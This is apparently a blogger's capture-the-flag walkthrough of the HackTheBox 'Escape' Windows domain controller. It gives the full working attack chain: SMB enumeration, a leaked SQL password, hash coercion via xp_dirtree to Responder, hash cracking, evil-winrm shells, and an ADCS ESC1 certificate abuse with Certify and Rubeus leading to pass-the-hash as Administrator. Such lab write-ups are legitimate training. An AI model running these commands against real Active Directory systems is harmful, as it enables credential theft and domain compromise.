Indeed it was one of the great windows machine to capture the flag for. I have had fun solving this one. Although I dig up a lot on HTB Forums and it took me 2 days to compile some of the binaries because of C# and Python dependencies. Let’s dive in it. Hope this Blog help you to solve Escape.htb.
Remember – If your compiled binaries are not working on the target machine than sometimes “Resetting the machines” helps. I struggled quite a few hours and just “resetting the target machine” solved my problem at one point.
- First run the following nmap scan and see the results.
$>nmap -p- --min-rate=1000 -Pn -T4 -sC -sV 10.10.11.202
Stats: 0:02:57 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 99.96% done; ETC: 00:16 (0:00:00 remaining)
Nmap scan report for 10.10.11.202
Host is up (0.018s latency).
Not shown: 65516 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2023-08-24 12:14:50Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-08-24T12:16:19+00:00; +8h00m02s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-08-24T12:16:20+00:00; +8h00m02s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-08-24T12:10:09
|_Not valid after: 2053-08-24T12:10:09
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-08-24T12:16:19+00:00; +8h00m02s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-08-24T12:16:19+00:00; +8h00m02s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after: 2023-11-18T21:20:35
|_ssl-date: 2023-08-24T12:16:20+00:00; +8h00m02s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49687/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49705/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 8h00m01s, deviation: 0s, median: 8h00m01s
| smb2-time:
| date: 2023-08-24T12:15:41
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 181.97 seconds
Perfect! You see plethora of ports are open and services are running on the target machine.
2. Notice “sequel.htb0” and “dc.sequel.htb0”. Let’s add it to host file first.
echo "10.10.11.202 sequel.htb0 dc.sequel.htb0" | sudo tee -a /etc/hosts
3. The nmap enumeration shows the following two ports for SMB
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
4. Let’s do smbclient -L on the machine. -L is for get the list of shares available on the host
smbclient -L \\\\sequel.htb0\\ OR smbclient -L \\\\dc.sequel.htb0\\
Password for [WORKGROUP\[snipped]]]: <<Just Hit Enter>>
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Public Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
5. Looks like multiple shares are available. We are going to explore each one of it using the following command as a part of our in-depth enumeration.
smbclient \\\\sequel.htb0\\ADMIN$
Password for [WORKGROUP\vandan]:
tree connect failed: NT_STATUS_ACCESS_DENIED //Access Denied for ADMIN$
smbclient \\\\sequel.htb0\\C$
Password for [WORKGROUP\vandan]:
tree connect failed: NT_STATUS_ACCESS_DENIED //Access Denied for C$
smbclient \\\\sequel.htb0\\IPC$
Password for [WORKGROUP\vandan]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_NO_SUCH_FILE listing \* //Connected but NO Files to list. That's fine. Let's pick the next one
smbclient \\\\sequel.htb0\\NETLOGON
Password for [WORKGROUP\vandan]:
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \* //ACCESS DENIED on listing
smb: \> exit
smbclient \\\\sequel.htb0\\Public
Password for [WORKGROUP\vandan]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022 // Looks like there's a PDF file here. Let's continue..
5184255 blocks of size 4096. 1475053 blocks available
smb: \> exit
smbclient \\\\sequel.htb0\\SYSVOL
Password for [WORKGROUP\vandan]:
Try "help" to get a list of possible commands.
smb: \> ls
NT_STATUS_ACCESS_DENIED listing \* // Access Denied
smb: \> exit
so The only “Public” share that has the PDF file in it. Rest of the shares are throwing access denied error. Let’s grab the PDF file and see what’s in there.
6. Grabbing the PDF from on local machine.
smbclient \\\\sequel.htb0\\Public
Password for [WORKGROUP\vandan]: <<Just Hit Enter>>
smb: \> ls
. D 0 Sat Nov 19 06:51:25 2022
.. D 0 Sat Nov 19 06:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 08:39:43 2022
5184255 blocks of size 4096. 1474575 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (420.8 KiloBytes/sec) (average 420.8 KiloBytes/sec)
smb: \> exit
7. The PDF file looks like this
7. Looking at the PDF file, we now know few key elements of the machine + users. There are few users – Ryan, Tom, Brandon and sequel. Moreover the user Brandon email ID is linked there in PDF with brandon.brown@sequel.htb. Four users. Oh! look, there’s credentials too in the “Bonus” section.
"For new hired and those that are still waiting their users to be created and perms assigned, can sneak a peek at the Database with
user PublicUser and password GuestUserCantWrite1 .""
8. So we have credentials for the SQL Server. We’re going to use the following command along with the creds posted above to connect to the remote host.
impacket-mssqlclient --help
usage: mssqlinstance.py [-h] [-timeout TIMEOUT] host
Asks the remote host for its running MSSQL Instances.
positional arguments:
host target host
9. Let’s connect
Using mssqlclient.py connect to the Sql server
$ mssqlclient.py "sequel/PublicUser:GuestUserCantWrite1@10.10.11.202"
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)>
10. Let’s execute some commands here and we can enumerate databases.
SQL (PublicUser guest@master)> SELECT name FROM master.dbo.sysdatabases;
name
------
master
tempdb
model
msdb
11. As we have access to the database, we can attempt to steal the NetNTLM hash or perform a relay attack using the responder command. Let’s setup responder in a separate terminal.
$ responder -I tun0 -v
12. We can force the SQL service to “authenticate to our machine” and capture the hash. If the SQL service is running as a user account, there is a high chance that the captured hash will be crackable.
13. From the connected SQL session run the following command
SQL>EXEC MASTER.sys.xp_dirtree '\\<<Your_Tunnel_iFace_IP>>\test', 1, 1
14. And we got the hash in a terminal where responder is running
$[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:b0d66a17e0a9e552:37955D7D8406C2D93A40BD49CE9C7C5C:010100000000000080DEE2F58756D901C32EFC472012DA560000000002000800490036003700340001001E00570049004E002D00300054004C0037004C0041003600580042004200340004003400570049004E002D00300054004C0037004C004100360058004200420034002E0049003600370034002E004C004F00430041004C000300140049003600370034002E004C004F00430041004C000500140049003600370034002E004C004F00430041004C000700080080DEE2F58756D901060004000200000008003000300000000000000000000000003000005A22B43D96B75A56CDC0097D521A7BE22DDE659B55B203B258D375E155661CC00A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00310037000000000000000000
15. Copy the hash in a file and let’s use John to crack the NTLM hash
# john --wordlist=/usr/share/wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 5 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
REGGIE1234ronnie (sql_svc) <------ We got the PWD here for the user sql_svc
1g 0:00:00:03 DONE (2023-08-24 23:33) 0.3289g/s 3520Kp/s 3520Kc/s 3520KC/s REVERIE119..REDMAN69
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
16. We will use evil-winrm to connect to the machine using the sql_svc user and password
# evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.5
*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc
*Evil-WinRM* PS C:\Users\sql_svc\Documents>
17. We got the access using sql_svc. Lateral Movement on the machine starts from here. “cd ..” twice and we norice other users that are present in the system. We got Ryan.Cooper. Earlier we notice the same user in the PDF file. Let’s dig deeper.
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:58 AM Administrator
d-r--- 7/20/2021 12:23 PM Public
d----- 2/1/2023 6:37 PM Ryan.Cooper
d----- 2/7/2023 8:10 AM sql_svc
18. So after I got the initial access, i checked all the directories from C:\ Drive. And I found SQLSERVER folder in which there was a Logs directory and it has one ERRORLOG.BAK file. Upon reading the file, I notice some important details.
[Snipped]
2022-11-18 13:43:07.44 spid51 Changed database context to 'master'.
2022-11-18 13:43:07.44 spid51 Changed language setting to us_english.
2022-11-18 13:43:07.44 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
[Snipped]
19. the user Ryan.Cooper tried to login and failed. because the password did not match. However, Notice the difference between :
Logon failed for user 'sequel.htb\Ryan.Cooper'
AND
Logon failed for user 'NuclearMosquito3'
20. it looks like the user Ryan.Cooper tries to login with the password ‘NuclearMosquito3’. Let’s see if we can WinRm with this credentials.
# evil-winrm -i 10.10.11.202 -u ryan.cooper -p NuclearMosquito3
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
21. And we got the user.txt flag.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> dir
Directory: C:\Users\Ryan.Cooper\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/25/2023 3:03 AM 34 user.txt
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Desktop> type user.txt
0ed80ed15fdca43c09c5769f157dbf5b
22. We got the shell access for the user ryan.cooper. So from public user to sql_svc and from there we land on ryan.cooper. Let’s start the Privilege Escalation. At this point, we need to find a way to elevate our privileges. Looking back at our initial enumeration output from Nmap we can see a lot of certificate related output. This is a strong indication that there is a Certificate Authority running. We can use Certify.exe to enumerate possible misconfiguration in Active Directory Certificate Services.
23. To begin, we will upload the Certify tool to the target machine. Download the certify.exe and from the ryan.cooper shell, just type upload certify.exe. This will upload the certify.exe located inside your last kali directory to the machine. See the example below
[~/Downloads/escape.htb/certify]ls
Certify.exe
[~/Downloads/escape.htb/certify]
└─# evil-winrm -i 10.10.11.202 -u ryan.cooper -p NuclearMosquito3
Evil-WinRM shell v3.5
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> upload Certify.exe
Info: Uploading /root/Downloads/escape.htb/certify/Certify.exe to C:\Users\Ryan.Cooper\Documents\Certify.exe
Data: 7096 bytes of 7096 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
24. Let’s perform the enumeration using the certify.exe to find the vulnerable certificate. Certify is a C# tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS). You will need to download Visual Studio Code 2019 along with .net 4.0 targeting pack to preapre your certify.exe release version. Here’s the Certify I used https://github.com/GhostPack/Certify.git
Git clone the certify, open with Visual Studio Code, select the Release as a solution configuration and hit start. It will create EXE in your release folder. upload it to the target machine using the Ryan.Cooper’s credentials
25. Running the following command using the certify will give you the vulnerable certificates on the Windows AD.
Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe find /vulnerable
_____ _ _ __
/ ____| | | (_)/ _|
| | ___ _ __| |_ _| |_ _ _
| | / _ \ '__| __| | _| | | |
| |___| __/ | | |_| | | | |_| |
\_____\___|_| \__|_|_| \__, |
__/ |
|___./
v1.1.0
[*] Action: Find certificate templates
[*] Using the search base 'CN=Configuration,DC=sequel,DC=htb'
[*] Listing info about the Enterprise CA 'sequel-DC-CA'
Enterprise CA Name : sequel-DC-CA
DNS Hostname : dc.sequel.htb
FullName : dc.sequel.htb\sequel-DC-CA
Flags : SUPPORTS_NT_AUTHENTICATION, CA_SERVERTYPE_ADVANCED
Cert SubjectName : CN=sequel-DC-CA, DC=sequel, DC=htb
Cert Thumbprint : A263EA89CAFE503BB33513E359747FD262F91A56
Cert Serial : 1EF2FA9A7E6EADAD4F5382F4CE283101
Cert Start Date : 11/18/2022 12:58:46 PM
Cert End Date : 11/18/2121 1:08:46 PM
Cert Chain : CN=sequel-DC-CA,DC=sequel,DC=htb
UserSpecifiedSAN : Disabled
CA Permissions :
Owner: BUILTIN\Administrators S-1-5-32-544
Access Rights Principal
Allow Enroll NT AUTHORITY\Authenticated UsersS-1-5-11
Allow ManageCA, ManageCertificates BUILTIN\Administrators S-1-5-32-544
Allow ManageCA, ManageCertificates sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
Allow ManageCA, ManageCertificates sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Enrollment Agent Restrictions : None
[!] Vulnerable Certificates Templates :
CA Name : dc.sequel.htb\sequel-DC-CA
Template Name : UserAuthentication
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : INCLUDE_SYMMETRIC_ALGORITHMS, PUBLISH_TO_DS
Authorized Signatures Required : 0
pkiextendedkeyusage : Client Authentication, Encrypting File System, Secure Email
mspki-certificate-application-policy : Client Authentication, Encrypting File System, Secure Email
Permissions
Enrollment Permissions
Enrollment Rights : sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Domain Users S-1-5-21-4078382237-1492182817-2568127209-513
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Object Control Permissions
Owner : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
WriteOwner Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteDacl Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
WriteProperty Principals : sequel\Administrator S-1-5-21-4078382237-1492182817-2568127209-500
sequel\Domain Admins S-1-5-21-4078382237-1492182817-2568127209-512
sequel\Enterprise Admins S-1-5-21-4078382237-1492182817-2568127209-519
Certify completed in 00:00:09.5166706
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
26. Three things to focus here. “Template Name“, “msPKI-Certificate-Name-Flag” and “mspki-enrollment-flag“. we can see that Authenticated Users can enroll for this template and since the “msPKI-Certificate-Name-Flag” is present and contains “ENROLLEE_SUPPLIES_OBJECT” the template is vulnerable to the ESC1 attack. After running Certify, we were able to identify a Vulnerable Certificate Template named UserAuthentication, with Enrollment Rights assigned to sequel\Domain Users. This could allows anyone to enroll in this template and specify an arbitrary Subject Alternative Name. Meaning that, we could authenticate as a Domain Administrator by exploiting this attack path. To exploit this vulnerability, first we need to request the certificate. Since this step requires some Kerberos interaction, we need to synchronize our clock to the time of the remote machine before we can proceed.
sudo ntpdate -u dc.sequel.htb
27. we can request a certificate using the following command.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Certify.exe request /ca:dc.sequel.htb\sequel-DC-CA /template:UserAuthentication /altname:Administrator
[*] Action: Request a Certificates
[*] Current user context : sequel\Ryan.Cooper
[*] No subject name specified, using current context as subject.
[*] Template : UserAuthentication
[*] Subject : CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] AltName : Administrator
[*] Certificate Authority : dc.sequel.htb\sequel-DC-CA
[*] CA Response : The certificate had been issued.
[*] Request ID : 10
[*] cert.pem :
-----BEGIN RSA PRIVATE KEY-----
[Snipped]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
[Snipped]
-----END CERTIFICATE-----
[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Certify completed in 00:00:12.4781059
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents>
28. Copy from “—–BEGIN RSA PRIVATE KEY—–” to “—–END CERTIFICATE—–” in a separate file and save it as pem file. After successfully requesting the certificate, we need to convert the generated PEM file to a PFX file using the openssl tool. When prompt for a password please make sure you keep it empty. Otherwise you will get password error when using the certificate.
# openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password:
Verifying - Enter Export Password:
┌──(root㉿kali)-[~/Downloads/escape.htb]
└─# ls
cert.pem cert.pfx
29. After converting the certificate to PFX format, we need to upload it to the target machine and use it to request a Kerberos TGT for the Administrator user. We can do this using the Rubeus tool with the following command: Download and upload the Rebeus tool and your cert.pfx file to the remote machnie. To upload it to remote machine, you can follow the same method as you followed to upload the Certify.exe tool.
30. Your directory will be look like this.
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> ls
Directory: C:\Users\Ryan.Cooper\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/25/2023 7:52 AM 3425 cert.pfx
-a---- 8/25/2023 7:01 AM 177152 Certify.exe
-a---- 8/25/2023 7:51 AM 207296 Invoke-Rubeus.ps1
31. After converting the certificate to PFX format, we need to upload it to the target machine and use it to request a Kerberos TGT for the Administrator user. We can do this using the Rubeus tool with the following command: “At this stage, I had to reset the machine.“
*Evil-WinRM* PS C:\Users\Ryan.Cooper\Documents> .\Rubeus.exe asktgt /user:administrator /certificate:C:\programdata\admincert
.pfx /getcredentials /show /nowrap
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.3
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=Ryan.Cooper, CN=Users, DC=sequel, DC=htb
[*] Building AS-REQ (w/ PKINIT preauth) for: 'sequel.htb\administrator'
[*] Using domain controller: fe80::b94e:90f4:8d28:64e7%4:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
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
ServiceName : krbtgt/sequel.htb
ServiceRealm : SEQUEL.HTB
UserName : administrator (NT_PRINCIPAL)
UserRealm : SEQUEL.HTB
StartTime : 8/27/2023 6:43:40 AM
EndTime : 8/27/2023 4:43:40 PM
RenewTill : 9/3/2023 6:43:40 AM
Flags : name_canonicalize, pre_authent, initial, renewable
KeyType : rc4_hmac
Base64(key) : tU71PF50jWYUndYrx0U0ag==
ASREP (key) : 022F1107E7B3B3E318DC16F8FFAC5BDD
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : A52F78E4C751E5F5E17E1E9F3E58F4EE
32. And we got the NTLM hash for the admin user. In the above command the last line “NTLM” and an admin hash. Now we can log in using the Administrator NTLM hash as following:
evil-winrm -i dc.sequel.htb -u Administrator -H A52F78E4C751E5F5E17E1E9F3E58F4EE
Evil-WinRM shell v3.4
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
27739950d84ab802ee7e5bcaaccda0ca
Got the root flag. Machine Pawned
Lesson Learned
- The Kerberos interaction require clock synchronization.
- compiling tools require some skills on how to solve dependencies issues. Please explore “GitHub Issues” page for the respective package.
- I initially struggled to explore the different entry points by trying different ports using curl, nmap scripts and spent quite a few hours in enumerating and there was a bit dead end.
- However, it does help and taught me what will NOT work to capture the flag.
- I read few ESC1 bolg posts and watched few conference talk on ESC1 which was bit helpful throughout the process.
Thank You!